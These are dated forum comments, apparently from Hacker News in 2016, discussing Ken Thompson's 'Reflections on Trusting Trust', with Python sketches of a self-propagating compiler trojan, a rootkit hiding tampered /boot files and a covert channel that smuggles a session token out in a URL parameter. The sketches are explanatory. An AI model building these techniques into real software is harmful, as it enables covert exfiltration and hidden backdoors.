Jul 11, 2016

"Reflections on Trusting Trust", Ken Thompson.


Jul 08, 2016

> There is a trusting trust issue here, of course.

In case anyone doesn't know, this is referencing a famous paper:


Some further discussion: https://www.schneier.com/blog/archives/2006/01/countering_tr...

Jun 09, 2016

So, it has come to this: https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp... (Ken Thompson "Reflections on Trusting Trust") in real life...

May 25, 2016

The Ken Thompson thing is presumably in reference to his popular piece "Reflections on Trusting Trust" (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...)

> As the level of program gets lower, these bugs will be harder and harder to detect. A well-installed microcode bug will be almost impossible to detect.

And this is even lower - in the hardware itself.

Really fascinating work.

May 25, 2016

Ken Thompson gave a lecture called "Reflections on Trusting Trust" [1] in 1984 that outlines a similar attack.

[1] https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...

May 25, 2016

This link (pdf) provides the missing context: https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...

May 12, 2016

> PS: who cares if the devs are using unsigned software downloaded over HTTP? I care about using signed software (and then I suppose the transport doesn't really matter), but that's totally unrelated to what the devs do on their own computers.

This is definitely a vector that attackers can and do use. If a developer's machine is infected, particularly by a virus that modifies the compiler to emit infected code, the infection can propagate, by proxy, into the products they develop.
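
That compiler-borne propagation is exactly Thompson's trusting-trust construction. Here's a minimal sketch of the idea (purely illustrative strings standing in for binaries, not any real toolchain): the trojaned "compiler" backdoors the login program, and when asked to compile a compiler it re-inserts itself, so even a clean, fully audited compiler source produces a trojaned binary:

```python
# Toy model of Thompson's trusting-trust attack. "Compiling" here is
# just passing strings through; the point is the self-reinserting patch.

BACKDOOR = "# backdoor: accept the magic password\n"

def evil_compile(source: str) -> str:
    """The trojaned compiler: honest output, except for two triggers."""
    if "login" in source:
        # Trigger 1: compiling the login program -> insert the backdoor.
        return BACKDOOR + source
    if "compile" in source:
        # Trigger 2: compiling a compiler -> propagate the trojan, even
        # though the compiler *source* being compiled is clean.
        return "EVIL:" + source
    return source

def run_compiler(binary: str, source: str) -> str:
    """Model executing a compiler 'binary' on some source."""
    if binary.startswith("EVIL:"):
        return evil_compile(source)
    return source  # an honest compiler just reproduces the source

clean_compiler_src = "def compile(src): return src  # honest compiler"
login_src = "def login(user, pw): ..."

# Rebuild the compiler from clean, auditable source -- but using the
# already-trojaned binary. The result is still trojaned:
new_compiler = run_compiler("EVIL:" + clean_compiler_src, clean_compiler_src)
assert new_compiler.startswith("EVIL:")
# ...and the rebuilt compiler still backdoors login:
assert run_compiler(new_compiler, login_src).startswith(BACKDOOR)
```

The unsettling part, as in the paper, is the last two lines: auditing `clean_compiler_src` tells you nothing, because the trojan lives only in the binary.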

See e.g.:


May 08, 2016

My money's on him not having reviewed all the lines of code in the Bitcoin client (or the operating system, even!) he's running, either, so... trust comes back in a different form.

In a way, it reminds me of the ol' "Reflections on Trusting Trust" (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...), but in a somewhat broader sense.

For my part, really, at the end of the day, I'd sooner trust institutions that have been around for a long, long time (far longer than I've been alive so far) than a coding project that's been around for less time than most of the popular websites I read.

But it'd be a funny old world if we were all alike, of course.

Apr 01, 2016

There are two trust problems that verifiable builds are supposed to solve:

1. Did the authors manipulate the source code compared to what they published?

2. Did a third party manipulate the binaries on the distribution channel?

Verifying a build can be done through a Docker image containing an Android build environment that we've published.
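
Mechanically, the last step of such a process boils down to hashing the locally rebuilt artifact against the one pulled from the distribution channel. A minimal sketch (file paths are placeholders, not OWS's actual layout):

```python
import hashlib

def sha256_of(path: str) -> str:
    """Stream a file through SHA-256 and return its hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def builds_match(rebuilt: str, distributed: str) -> bool:
    """True iff the locally rebuilt artifact is byte-identical to the
    distributed one. Note this only addresses problem 2 (tampering on
    the distribution channel), not a trojaned toolchain."""
    return sha256_of(rebuilt) == sha256_of(distributed)
```

E.g. `builds_match("build/Signal.apk", "downloaded/Signal.apk")` (hypothetical names). As the comment below notes, a matching hash proves the build is reproducible from the published source, not that the toolchain producing both is honest.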

For the verification, you now depend on a complex binary blob provided by the authors, that is distributed through a different channel (Docker images instead of Google Play).

This is a good solution to the second problem, but it does not preclude OWS insiders from injecting malicious code (they merely need to add the backdoor at the SDK level[0] and use that same SDK for the public releases). Such a manipulation could be performed by an evil insider, or be part of a "government cooperation". I am not saying that OWS is or will be doing this. This is merely an observation of the shortcomings of the overall solution.

[0] "Reflections on Trusting Trust" https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...

Mar 20, 2016

The attacker is not going to keep the SHA256 hashes, but the whole of the original /boot. (Where, you're asking? Anywhere you forgot Ring 0 could store data, and a few places you never even knew about.) Subsequently, he will intercept system calls to open(2) and friends, and serve the saved data. This is a fairly old technique: on the first page of a Google search[1], you can find a Phrack article from 2009[2]. In fact, the seminal work, I believe, is "Reflections on Trusting Trust" by Ken Thompson, set in print in 1984[3].

[1] https://www.google.co.uk/search?q=rootkit+intercepting+open+...

[2] http://phrack.org/issues/66/16.html

[3] https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...
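
The serve-the-saved-data trick can be modeled in miniature. In the sketch below (an in-memory stand-in; a real rootkit does this in Ring 0 by hooking the syscall path, and the paths here are just examples), the attacker stashes the pristine bytes before tampering, and the hooked read answers any integrity checker with the stash:

```python
# Model of a rootkit intercepting open(2)/read: the disk holds the
# malicious bytes, but reads of tampered paths return the saved copy.

saved_pristine = {}  # path -> original bytes, stashed before tampering
disk = {}            # path -> bytes actually on disk

def tamper(path: str, evil: bytes) -> None:
    saved_pristine[path] = disk[path]  # stash the original first
    disk[path] = evil                  # then write the malicious version

def hooked_read(path: str) -> bytes:
    """What userspace sees once the hook is in place: tampered paths
    are answered from the stash, everything else from the real disk."""
    return saved_pristine.get(path, disk[path])

disk["/boot/vmlinuz"] = b"pristine kernel"
disk["/etc/passwd"] = b"users"
tamper("/boot/vmlinuz", b"evil kernel")

assert disk["/boot/vmlinuz"] == b"evil kernel"             # what boots
assert hooked_read("/boot/vmlinuz") == b"pristine kernel"  # what a checker sees
assert hooked_read("/etc/passwd") == b"users"              # untouched files unaffected
```

This is why checking hashes from inside a possibly-compromised system proves nothing: the measurement itself goes through the attacker's code.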

Jan 11, 2016

A readable text format, but at a much lower level of abstraction than JavaScript currently sits at. Different is different.

It's not so much about spying on your computer and gaining extra access; it's obvious (short of implementation bugs) that you won't gain any additional privileges that way.

But what you will gain is a way to obfuscate, extremely well, "report such and such to some webserver" in a way that's difficult to detect. For example, you can hide the entropy inside a fairly innocent-looking URL, and without a lot of digging you won't know what that entropy represents. It can look like just a plain-Jane resource request, and the webserver can serve up the exact same resource no matter what the entropy is, but also record that entropy as a back-channel way of exfiltrating information from your browser.
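
A concrete version of the innocent-looking-URL trick (hostname and filename invented for illustration): pack the stolen bytes into something that parses as an ordinary cache-busted asset request. The server returns the same image for every value of `v` and simply logs the token:

```python
import base64

def exfil_url(secret: bytes) -> str:
    """Encode secret bytes as what looks like a cache-buster parameter."""
    # Base32 keeps the token in [a-z2-7], so it passes as a version tag.
    token = base64.b32encode(secret).decode().rstrip("=").lower()
    return f"https://cdn.example.com/img/logo.png?v={token}"

def recover(url: str) -> bytes:
    """What the attacker's webserver does with the logged token."""
    token = url.split("?v=")[1].upper()
    token += "=" * (-len(token) % 8)  # restore base32 padding
    return base64.b32decode(token)

url = exfil_url(b"session=abc123")
assert recover(url) == b"session=abc123"
```

Nothing about the request is privileged; the channel exists purely because the resource name carries entropy the server can record.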

Finally, it opens up a whole new world of compiler attacks. Right now the attacks against WordPress involve writing some information into a file and making it look "weird, but I don't know what it does, so I'd better not touch it".

What happens when breaking into a WordPress install means you can execute the equivalent of Thompson's untraceable compiler login-exploit insertion attack? You can't perform this attack without 1) a compiler and 2) a low-level target that's hard to understand. You don't even need to perform a stage 3 attack, which is the most sophisticated; a stage 2 would do fine.